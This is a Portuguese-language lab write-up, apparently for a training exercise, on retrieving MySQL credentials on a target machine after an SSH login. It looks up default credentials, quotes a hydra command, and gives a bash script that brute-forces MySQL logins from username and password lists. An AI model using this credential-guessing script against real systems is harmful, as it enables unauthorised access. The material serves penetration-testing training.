Question

1. Utilize as credenciais fornecidas para acessar a máquina de destino e recuperar as credenciais do MySQL. Envie-as como resposta. (Format: <username>:<password>)

• Primeiro devemos fazer o login via ssh e verificar se o mysql está em execução

service mysql status

• Em seguida procurar por Default credentials

• Iremos instalar esta a ferramenta defaultcreds-cheat-sheet para automatizar esse processo, ao procurar por credenciais padrão do mysql

pip3 install defaultcreds-cheat-sheet

• Após a instalação, podemos usar o credscomando para buscar credenciais padrão conhecidas associadas ao mysql

creds search mysql

• A porta 3306 do mysql não é visivel externamente, então não há necessidade de usar o hydra (hydra -C user_pass.list mysql//:ip) para tentativa de acesso

• Criei uma lista de usuários e passwords de forma manual com base no que encontramos, em seguida fiz um script para automatizar o processo de acesso com credencias padrão válidas

• Isso tem que ser feito no alvo

• Script

#!/bin/bash

HOST="127.0.0.1"
PORT="3306"

while read usuario; do
    while read senha; do
        echo "Testando $usuario:$senha"

        mysql -h "$HOST" -P "$PORT" -u "$usuario" -p"$senha" -e "SELECT 1;" >/dev/null 2>&1

        if [ $? -eq 0 ]; then
            echo "[+] SUCESSO -> Usuario: $usuario | Senha: $senha"
            exit 0
        fi

    done < senhas.txt
done < usuarios.txt

echo "[-] Nenhuma credencial funcionou"

• Tornar executável

chmod +x test_mysql.sh

• Executar

./test_mysql.sh